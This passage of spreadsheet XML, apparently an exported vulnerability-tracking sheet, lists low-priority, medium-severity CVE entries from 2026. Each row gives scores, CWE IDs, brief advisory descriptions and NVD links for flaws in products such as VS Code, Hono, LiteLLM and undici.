          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81275</t>
        </is>
      </c>
    </row>
    <row r="4053">
      <c r="A4053" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81377</t>
        </is>
      </c>
      <c r="C4053" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4053" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4053" s="5" t="inlineStr"/>
      <c r="F4053" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G4053" s="5" t="inlineStr"/>
      <c r="H4053" s="5" t="inlineStr"/>
      <c r="I4053" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4053" s="5" t="inlineStr"/>
      <c r="K4053" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4053" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to perform tampering over a network.</t>
        </is>
      </c>
      <c r="M4053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81377</t>
        </is>
      </c>
    </row>
    <row r="4054">
      <c r="A4054" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81381</t>
        </is>
      </c>
      <c r="C4054" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4054" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4054" s="5" t="inlineStr"/>
      <c r="F4054" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G4054" s="5" t="inlineStr"/>
      <c r="H4054" s="5" t="inlineStr"/>
      <c r="I4054" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4054" s="5" t="inlineStr"/>
      <c r="K4054" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L4054" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81381</t>
        </is>
      </c>
    </row>
    <row r="4055">
      <c r="A4055" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81666</t>
        </is>
      </c>
      <c r="C4055" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4055" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4055" s="5" t="inlineStr"/>
      <c r="F4055" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4055" s="5" t="inlineStr"/>
      <c r="H4055" s="5" t="inlineStr"/>
      <c r="I4055" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4055" s="5" t="inlineStr"/>
      <c r="K4055" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L4055" s="5" t="inlineStr">
        <is>
          <t>An integer overflow was found in Corosync's handling of membership commit token messages. The length-validation check for these messages can be bypassed on 32-bit systems due to an integer overflow in the calculation of the expected message length, allowing a crafted network packet to trigger an out-of-bounds memory access that crashes the Corosync daemon. This results in a denial of service for the affected cluster node. The overflow does not occur on 64-bit systems, where the length calculation is correctly performed in 64-bit arithmetic.</t>
        </is>
      </c>
      <c r="M4055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81666</t>
        </is>
      </c>
    </row>
    <row r="4056">
      <c r="A4056" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81782</t>
        </is>
      </c>
      <c r="C4056" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4056" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4056" s="5" t="inlineStr"/>
      <c r="F4056" s="5" t="inlineStr"/>
      <c r="G4056" s="5" t="inlineStr"/>
      <c r="H4056" s="5" t="inlineStr"/>
      <c r="I4056" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4056" s="5" t="inlineStr"/>
      <c r="K4056" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4056" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in WP Docs &lt;= 2.3.1 versions.</t>
        </is>
      </c>
      <c r="M4056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81782</t>
        </is>
      </c>
    </row>
    <row r="4057">
      <c r="A4057" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81785</t>
        </is>
      </c>
      <c r="C4057" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4057" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4057" s="5" t="inlineStr"/>
      <c r="F4057" s="5" t="inlineStr"/>
      <c r="G4057" s="5" t="inlineStr"/>
      <c r="H4057" s="5" t="inlineStr"/>
      <c r="I4057" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4057" s="5" t="inlineStr"/>
      <c r="K4057" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4057" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in BuddyForms &lt;= 2.9.0 versions.</t>
        </is>
      </c>
      <c r="M4057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81785</t>
        </is>
      </c>
    </row>
    <row r="4058">
      <c r="A4058" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81787</t>
        </is>
      </c>
      <c r="C4058" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4058" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4058" s="5" t="inlineStr"/>
      <c r="F4058" s="5" t="inlineStr"/>
      <c r="G4058" s="5" t="inlineStr"/>
      <c r="H4058" s="5" t="inlineStr"/>
      <c r="I4058" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4058" s="5" t="inlineStr"/>
      <c r="K4058" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L4058" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Authentication in IMPress for IDX Broker &lt;= 3.3.0 versions.</t>
        </is>
      </c>
      <c r="M4058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81787</t>
        </is>
      </c>
    </row>
    <row r="4059">
      <c r="A4059" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81791</t>
        </is>
      </c>
      <c r="C4059" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4059" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4059" s="5" t="inlineStr"/>
      <c r="F4059" s="5" t="inlineStr"/>
      <c r="G4059" s="5" t="inlineStr"/>
      <c r="H4059" s="5" t="inlineStr"/>
      <c r="I4059" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4059" s="5" t="inlineStr"/>
      <c r="K4059" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4059" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in EventON &lt;= 2.5.7 versions.</t>
        </is>
      </c>
      <c r="M4059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81791</t>
        </is>
      </c>
    </row>
    <row r="4060">
      <c r="A4060" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81792</t>
        </is>
      </c>
      <c r="C4060" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4060" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4060" s="5" t="inlineStr"/>
      <c r="F4060" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4060" s="5" t="inlineStr"/>
      <c r="H4060" s="5" t="inlineStr"/>
      <c r="I4060" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4060" s="5" t="inlineStr"/>
      <c r="K4060" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L4060" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Privilege Escalation in Product Catalog Enquiry for WooCommerce by MultiVendorX &lt;= 6.1.4 versions.</t>
        </is>
      </c>
      <c r="M4060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81792</t>
        </is>
      </c>
    </row>
    <row r="4061">
      <c r="A4061" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81793</t>
        </is>
      </c>
      <c r="C4061" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4061" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4061" s="5" t="inlineStr"/>
      <c r="F4061" s="5" t="inlineStr"/>
      <c r="G4061" s="5" t="inlineStr"/>
      <c r="H4061" s="5" t="inlineStr"/>
      <c r="I4061" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4061" s="5" t="inlineStr"/>
      <c r="K4061" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4061" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Salon booking system &lt;= 10.31.5 versions.</t>
        </is>
      </c>
      <c r="M4061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81793</t>
        </is>
      </c>
    </row>
    <row r="4062">
      <c r="A4062" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81802</t>
        </is>
      </c>
      <c r="C4062" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4062" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4062" s="5" t="inlineStr"/>
      <c r="F4062" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4062" s="5" t="inlineStr"/>
      <c r="H4062" s="5" t="inlineStr"/>
      <c r="I4062" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4062" s="5" t="inlineStr"/>
      <c r="K4062" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4062" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Insecure Direct Object References (IDOR) in WpEvently &lt;= 5.6.0 versions.</t>
        </is>
      </c>
      <c r="M4062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81802</t>
        </is>
      </c>
    </row>
    <row r="4063">
      <c r="A4063" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82123</t>
        </is>
      </c>
      <c r="C4063" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4063" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4063" s="5" t="inlineStr"/>
      <c r="F4063" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4063" s="5" t="inlineStr"/>
      <c r="H4063" s="5" t="inlineStr"/>
      <c r="I4063" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4063" s="5" t="inlineStr"/>
      <c r="K4063" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4063" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Tangible Loops &amp; Logic.</t>
        </is>
      </c>
      <c r="M4063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82123</t>
        </is>
      </c>
    </row>
    <row r="4064">
      <c r="A4064" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82299</t>
        </is>
      </c>
      <c r="C4064" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4064" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4064" s="5" t="inlineStr"/>
      <c r="F4064" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4064" s="5" t="inlineStr"/>
      <c r="H4064" s="5" t="inlineStr"/>
      <c r="I4064" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4064" s="5" t="inlineStr"/>
      <c r="K4064" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4064" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization (CWE-863) in Kibana can lead to information disclosure via Exploiting Incorrectly Configured Access Control Security Levels (CAPEC-180).</t>
        </is>
      </c>
      <c r="M4064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82299</t>
        </is>
      </c>
    </row>
    <row r="4065">
      <c r="A4065" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84282</t>
        </is>
      </c>
      <c r="C4065" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4065" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4065" s="5" t="inlineStr"/>
      <c r="F4065" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4065" s="5" t="inlineStr"/>
      <c r="H4065" s="5" t="inlineStr"/>
      <c r="I4065" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4065" s="5" t="inlineStr"/>
      <c r="K4065" s="5" t="inlineStr"/>
      <c r="L4065" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability exists in the ONLYOFFICE ownCloud Integration plugin version 9.12. The /apps/onlyoffice/ajax/settings/address endpoint does not sufficiently validate the user-supplied Document Server URL before initiating outbound connections. An authenticated administrator can manipulate the document server parameter to cause the ownCloud server to send arbitrary requests to attacker-controlled destinations, including localhost and internal network hosts. This allows internal network reconnaissance and TCP port scanning based on differences in server responses.</t>
        </is>
      </c>
      <c r="M4065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84282</t>
        </is>
      </c>
    </row>
    <row r="4066">
      <c r="A4066" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84306</t>
        </is>
      </c>
      <c r="C4066" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4066" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4066" s="5" t="inlineStr"/>
      <c r="F4066" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4066" s="5" t="inlineStr"/>
      <c r="H4066" s="5" t="inlineStr"/>
      <c r="I4066" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4066" s="5" t="inlineStr"/>
      <c r="K4066" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L4066" s="5" t="inlineStr">
        <is>
          <t>Filament is a collection of full-stack components for accelerated Laravel development. From 4.0.0 until 4.12.6 and 5.7.6, packages/panels/src/Auth/MultiFactor/App/AppAuthentication.php uses AppAuthentication::verifyCode() with a used-code cache key derived from both the app authentication secret and the submitted TOTP code. This isolates the newest accepted timestep by code instead of by secret, allowing a previously issued app-based MFA code to be accepted after a newer code has already been used. Reuse of the exact same code was already prevented, but another code inside the accepted time window remained usable. An attacker who obtains the target account's password and one app-based MFA code can use that code for the remainder of the configured window, which is approximately four minutes with the default settings, even after the legitimate account holder logs in with a newer code. Email-based MFA is not affected. This issue is fixed in versions 4.12.6 and 5.7.6.</t>
        </is>
      </c>
      <c r="M4066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84306</t>
        </is>
      </c>
    </row>
    <row r="4067">
      <c r="A4067" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84327</t>
        </is>
      </c>
      <c r="C4067" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4067" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4067" s="5" t="inlineStr"/>
      <c r="F4067" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4067" s="5" t="inlineStr"/>
      <c r="H4067" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I4067" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J4067" s="5" t="inlineStr"/>
      <c r="K4067" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4067" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Autofill in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker leveraging social engineering to obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84327</t>
        </is>
      </c>
    </row>
    <row r="4068">
      <c r="A4068" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84365</t>
        </is>
      </c>
      <c r="C4068" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4068" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4068" s="5" t="inlineStr"/>
      <c r="F4068" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4068" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4068" s="5" t="inlineStr"/>
      <c r="I4068" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4068" s="5" t="inlineStr"/>
      <c r="K4068" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4068" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. From 4.12.12 until 4.13.5, the fix released for CVE-2026-39408 does not cover every traversal sequence, and toSSG() can still write files outside the configured output directory when a route parameter contains consecutive parent-directory segments. Static site generation builds each output path from the route path and values supplied through ssgParams, then verifies that the result stays inside the output directory using the same normalization routine that built the path. That routine does not fully collapse runs of consecutive parent-directory segments, allowing a path that the check accepts to resolve outside the output directory, and the check also treats output directories that differ in how they are rooted as equivalent. This arises when an application generates a static site from route parameter values it does not fully control, such as slugs from a CMS, API, or user submission. An untrusted ssgParams value can create or overwrite files elsewhere in the build environment and alter generated artifacts or deployment output. The vulnerability affects build-time static site generation only; request-time routing and applications with entirely developer-controlled ssgParams values are not affected. This issue is fixed in version 4.13.5.</t>
        </is>
      </c>
      <c r="M4068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84365</t>
        </is>
      </c>
    </row>
    <row r="4069">
      <c r="A4069" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84377</t>
        </is>
      </c>
      <c r="C4069" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4069" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4069" s="5" t="inlineStr"/>
      <c r="F4069" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4069" s="5" t="inlineStr"/>
      <c r="H4069" s="5" t="inlineStr"/>
      <c r="I4069" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J4069" s="5" t="inlineStr"/>
      <c r="K4069" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4069" s="5" t="inlineStr">
        <is>
          <t>LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. Prior to versions 1.88.6 and 1.96.2, any authenticated LiteLLM proxy user could redirect an outbound provider call to a destination the user controls and cause the proxy to send its configured provider credentials to that destination. Request validation in litellm/proxy/auth/auth_utils.py, litellm/proxy/common_request_processing.py, litellm/proxy/health_endpoints/_health_endpoints.py, litellm/proxy/image_endpoints/endpoints.py, and litellm/proxy/litellm_pre_call_utils.py used incomplete checks that did not cover every sensitive parameter or inspect equivalent values across nested request fields, path values, and bracket-notation form data. Routing and credential parameters including api_base, base_url, model_list, fallbacks, and litellm_credential_name could therefore be applied without clearing the operator's stored key, exposing upstream provider credentials and other configured secrets and permitting server-side requests to internal services reachable by the proxy. This issue is fixed in versions 1.88.6 and 1.96.2.</t>
        </is>
      </c>
      <c r="M4069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84377</t>
        </is>
      </c>
    </row>
    <row r="4070">
      <c r="A4070" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84391</t>
        </is>
      </c>
      <c r="C4070" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4070" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4070" s="5" t="inlineStr"/>
      <c r="F4070" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4070" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H4070" s="5" t="inlineStr"/>
      <c r="I4070" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4070" s="5" t="inlineStr"/>
      <c r="K4070" s="5" t="inlineStr">
        <is>
          <t>CWE-457</t>
        </is>
      </c>
      <c r="L4070" s="5" t="inlineStr">
        <is>
          <t>A use of uninitialized variable vulnerability in Fortinet FortiAnalyzer 7.6.3 through 7.6.6 may allow attacker to denial of service via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M4070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84391</t>
        </is>
      </c>
    </row>
    <row r="4071">
      <c r="A4071" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84685</t>
        </is>
      </c>
      <c r="C4071" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4071" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4071" s="5" t="inlineStr"/>
      <c r="F4071" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4071" s="5" t="inlineStr"/>
      <c r="H4071" s="5" t="inlineStr"/>
      <c r="I4071" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4071" s="5" t="inlineStr"/>
      <c r="K4071" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L4071" s="5" t="inlineStr">
        <is>
          <t>The react-native-auth0 SDK's web platform implementation does not scope its in-memory token cache to individual user sessions when operating in a server-side rendering (SSR) environment where module state persists across HTTP requests. Under the listed preconditions, tokens cached in module memory can be retrieved across subsequent requests processed by the same server runtime.</t>
        </is>
      </c>
      <c r="M4071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84685</t>
        </is>
      </c>
    </row>
    <row r="4072">
      <c r="A4072" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84828</t>
        </is>
      </c>
      <c r="C4072" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4072" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4072" s="5" t="inlineStr"/>
      <c r="F4072" s="5" t="inlineStr"/>
      <c r="G4072" s="5" t="inlineStr"/>
      <c r="H4072" s="5" t="inlineStr"/>
      <c r="I4072" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4072" s="5" t="inlineStr"/>
      <c r="K4072" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="L4072" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in PCS (Pacemaker Configuration System). A local attacker with membership in the 'haclient' group can exploit the 'pcs host auth --token' command to read the contents of arbitrary files on the filesystem, provided the files are shorter than 256 bytes. The file contents are read with root privileges by the pcsd daemon and can be exfiltrated by the attacker through subsequent cluster node communication. This allows disclosure of sensitive data such as API keys, tokens, or configuration secrets that would otherwise be inaccessible to the attacker.</t>
        </is>
      </c>
      <c r="M4072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84828</t>
        </is>
      </c>
    </row>
    <row r="4073">
      <c r="A4073" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84933</t>
        </is>
      </c>
      <c r="C4073" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4073" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4073" s="5" t="inlineStr"/>
      <c r="F4073" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4073" s="5" t="inlineStr"/>
      <c r="H4073" s="5" t="inlineStr"/>
      <c r="I4073" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4073" s="5" t="inlineStr"/>
      <c r="K4073" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-524</t>
        </is>
      </c>
      <c r="L4073" s="5" t="inlineStr">
        <is>
          <t>undici's cache interceptor does not handle the Set-Cookie response header anywhere in its cache path, so it neither refuses to store nor strips that header. In shared cache mode, which is the default, an otherwise cacheable response that carries a Set-Cookie header, for example one marked with a public and max-age directive, is stored and then re-served to a later caller that matches the same cache key. As a result one caller's cookie is disclosed to a different caller, and an untrusted server can inject cookies into cached responses served to all subsequent callers. This violates the requirement that a shared cache must not store cookies. This affects undici versions from 7.0.0 up to 7.29.1 and from 8.0.0 up to 8.10.2. Users should upgrade to undici 7.29.1 or 8.10.2.</t>
        </is>
      </c>
      <c r="M4073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84933</t>
        </is>
      </c>
    </row>
    <row r="4074">
      <c r="A4074" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85044</t>
        </is>
      </c>
      <c r="C4074" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4074" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4074" s="5" t="inlineStr"/>
      <c r="F4074" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4074" s="5" t="inlineStr"/>
      <c r="H4074" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I4074" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4074" s="5" t="inlineStr"/>
      <c r="K4074" s="5" t="inlineStr">
        <is>
          <t>CWE-672</t>
        </is>
      </c>
      <c r="L4074" s="5" t="inlineStr">
        <is>
